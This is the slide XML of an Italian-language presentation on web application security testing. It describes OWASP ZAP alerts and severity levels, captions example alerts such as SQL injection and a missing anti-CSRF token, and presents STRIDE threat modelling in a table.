                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) che viene indicata nella sezione Cronologia di OWASP ZAP si riferisce a una potenziale vulnerabilità o a un problema di sicurezza rilevato durante l'analisi dell'applicazione web. Questo allerta viene quindi registrato e visualizzato nella sezione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Avvisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>di OWASP ZAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>gni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> a un livello di severità che indica l'importanza o il rischio relativo alla vulnerabilità individuata. Il livello di severità aiuta a valutare la gravità dell'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e a identificare le vulnerabilità che richiedono un'attenzione immediata.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRP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9" name="Immagine 8" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB09CCD-3A40-BC89-2CFB-3DAF34FCFD9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7890398" y="2287851"/>
            <a:ext cx="3026905" cy="4207398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30226416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Esempio avviso SQL Injection</a:t>
            </a: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9" name="Immagine 8" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE47495-8DA0-72C8-F8F1-7512F06AADD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932972" y="3319670"/>
            <a:ext cx="7772400" cy="2532163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766517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Esempio di avviso di assenza di token Anti-CSRF</a:t>
            </a:r>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10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93BD90D8-C80B-8824-F660-15C31A6046C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1747778" y="3319670"/>
            <a:ext cx="7772400" cy="2444209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21355830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Esempio di avviso Buffer Overflow</a:t>
            </a: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12" name="Immagine 11" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E435B4-4B7E-9682-C738-126869D08B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1863524" y="3223889"/>
            <a:ext cx="7772400" cy="2948311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8467684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OWASP ZAP</a:t>
            </a:r>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Esempio di avviso CSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRP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6" name="Immagine 5" descr="Immagine che contiene testo, schermata, ricevuta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A154DDBE-29E5-59F1-A1AB-7A574B435BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675437" y="3269552"/>
            <a:ext cx="7772400" cy="2510369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55503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E7F19E0-303F-D977-3556-907DADE26EB3}"/>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a:t>Threat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>Modeling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24"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8216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Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modeling</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endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è un passo fondamentale in quanto permette di identificare, enumerare e comprendere le minacce che possono interessare l'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Consentendo anche l’individuazione delle contromisure necessarie per mitigare e gestire le minacce.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A partire da un’astrazione del sistema, questo processo fornisce dunque un catalogo di minacce che potrebbero insorgere se non mitigate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0"/>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21382962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Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modeling</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Per modellare l’applicazione e identificare i potenziali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, è stato utilizzato il tool Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Tool, basato sulla classificazione STRIDE.</a:t>
            </a:r>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Tabella 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5249D0BA-FB6C-BBA5-B61E-E7729D346CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1422243527"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="646314" y="3319670"/>
          <a:ext cx="10899371" cy="3134360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2977252">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1697981883"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2452344">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3610891274"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5469775">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="262589363"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0" err="1"/>
                        <a:t>Threat</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0"/>
                        <a:t>Proprietà violata</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0"/>
                        <a:t>Definizione</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2703486480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Spoofing</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Authenticity</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Impersonare qualcuno o qualcos’altro</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="56328340"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Tampering</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Integrity</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Modificare dati memorizzati, in rete…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3614227053"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0" err="1"/>
                        <a:t>Repudiation</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Non </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Repudiation</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0"/>
                        <a:t>Affermare di non aver fatto una determinata azione</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3947895651"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Information Disclosure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Confidentiality</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Fornire informazioni a utenti non autorizzati</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="837350964"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0" err="1"/>
                        <a:t>Denial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0"/>
                        <a:t> of Service</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Availability</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t>Impedire l’accesso a risorse e/o servizi</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1211175322"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Elevation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT"/>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Privilege</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" err="1"/>
                        <a:t>Authorization</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="it-IT" dirty="0"/>
                        <a:t>Eseguire un’azione che richiederebbe maggiori permessi</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3457839566"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1973884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Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modeling</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene schermata, testo, linea, diagramma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C66E1B-7B6D-9F67-0B08-0131FCEE5E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2952865"/>
            <a:ext cx="10307637" cy="3142122"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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077665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err="1"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modeling</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Segnaposto contenuto 11" descr="Immagine che contiene testo, schermata, ricevuta&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D158B70C-F2A3-71E3-0F18-C2F04BBCEEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116013" y="2769245"/>
            <a:ext cx="10167937" cy="3111798"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
